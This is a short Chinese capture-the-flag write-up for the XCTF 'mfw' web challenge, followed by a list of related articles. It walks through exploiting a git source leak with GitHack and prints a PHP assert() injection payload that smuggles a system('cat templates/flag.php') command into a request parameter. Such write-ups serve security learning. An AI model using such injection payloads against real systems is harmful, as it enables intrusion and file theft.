攻防世界web高手進階18(mfw)
攻防世界web高手進階18(mfw)
開啟題目先收集有用的資訊
是用了Git、PHP、Bootstrap,嘗試是否有git原始碼洩露
有git原始碼洩露漏洞,直接上工具扒。
工具下載命令(Linux)
git clone https://github.com/lijiejie/GitHack.git
直接檢視flag.php沒有資料資訊
檢視一下index.php
strpos()函式會匹配第一個引數與另一個引數匹配,如果一樣則為false,然後就會。。。。
所以用工具爬是個不錯的選擇
file_exists() 函式檢查檔案或目錄是否存在
assert()函式會將括號中的字元當成程式碼來執行
所以可以嘗試從assert()函式入手,構建pyload
') or system("cat templates/flag.php");//
帶入程式碼中為:
assert("file_exists('') or system("cat templates/flag.php");//')") or die("That file doesn't exist!");
其 中//
起到的是註釋後面程式碼的作用
沒得回顯,檢視下原始碼
相關文章
- 攻防世界web高手進階之blgdelWeb
- 攻防世界 web高手進階區 10分題 urlWeb
- 攻防世界 Reverse高手進階區 2分題 Mysterious
- 攻防世界 Misc高手進階區 5分題 picture2
- 攻防世界 Misc高手進階區 5分題 側通道初探
- 攻防世界 Misc高手進階區 2分題 心儀的公司
- 攻防世界-web2Web
- xctf-web(高手進階區)-supersqliWebSQL
- 攻防世界web題ics-06Web
- xctf攻防世界—Web新手練習區 writeupWeb
- Linux-高手進階之路Linux
- hackme 【攻防世界】Reverse
- Web前端攻防Web前端
- 攻防世界php2PHP
- Web之前端攻防Web前端
- JVM菜鳥進階高手之路十四:分析篇JVM
- Web 開發進階指南Web
- 攻防世界之NaNNaNNaNNaN-BatmanNaNBAT
- 黑客攻防進階: ARP攻擊第三章黑客
- js高手進階之路:underscore原始碼經典(完)JS原始碼
- js高手進階之路:underscore原始碼經典(二)JS原始碼
- js高手進階之路:underscore原始碼經典(一)JS原始碼
- js高手進階之路:underscore原始碼經典(三)JS原始碼
- web前端進階篇(一 )JSWeb前端JS
- (攻防sj)web unserialize3Web
- HTML5 進階系列:web StorageHTMLWeb
- 高手請進
- Android高手進階之兩幅圖搞定DilogFragmentAndroidFragment
- 前端進階(1)Web前端效能優化前端Web優化
- C1 能力認證——Web進階Web
- web知識進階——字元編解碼Web字元
- Mysql系列第十七講 流程控制語句(高手進階)MySql
- Web安全的三個攻防姿勢Web
- Ionic APP-Web SPA開發進階(一)AngularJS全棧工程獅進階APPWebAngularJS全棧
- web前端進階篇(二) 瀏覽器 WebpackWeb前端瀏覽器
- BCB高手進階 (十)用Sender引數實現程式碼重用 (轉)
- C++Builder 高手進階 (一)編寫彈出廣告殺手 (轉)C++UI
- 常見的Web安全及其攻防姿勢Web